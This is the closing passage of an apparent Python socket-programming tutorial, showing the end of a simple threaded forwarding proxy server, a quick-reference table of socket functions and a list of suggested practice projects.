            # Receive request from client
            request = client_socket.recv(4096)
            target = _parse_target(request)
            if target is None:
                # Empty or malformed request: nothing to forward
                return
            # Connect to destination; `with` closes it on errors too
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as dest:
                dest.connect(target)
                dest.sendall(request)
                while True:
                    data = dest.recv(4096)
                    if not data:
                        break
                    client_socket.sendall(data)
        except (OSError, UnicodeError) as e:
            # UnicodeError: the hostname could not be encoded for resolution
            print(f"Error: {e}")
def proxy_server(host="0.0.0.0", port=8888):
    """Accept proxy clients forever, serving each one in its own thread.

    Args:
        host: Local address to bind to.
        port: TCP port to listen on.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((host, port))
    listener.listen(10)
    print(f"[*] Proxy server running on {host}:{port}")
    while True:
        conn, peer = listener.accept()
        print(f"[+] Request from {peer}")
        # Each request gets its own thread so slow destinations do not
        # hold up new clients
        threading.Thread(target=handle_client, args=(conn,)).start()


if __name__ == "__main__":
    proxy_server()

🎯 Quick Reference#

| Function | Description |
|---|---|
| socket() | Create a socket |
| bind() | Bind to address |
| listen() | Start listening |
| accept() | Accept connection |
| connect() | Connect to server |
| send() | Send data |
| recv() | Receive data |
| close() | Close socket |
| settimeout() | Set timeout |
| gethostname() | Get local hostname |
| gethostbyname() | Resolve hostname |

🎉 You’re Now a Socket Master!#

Practice by building:

  • Port scanners
  • Chat applications
  • File transfer tools
  • Network utilities
  • Security tools

Created by cat0x01 🥷🏻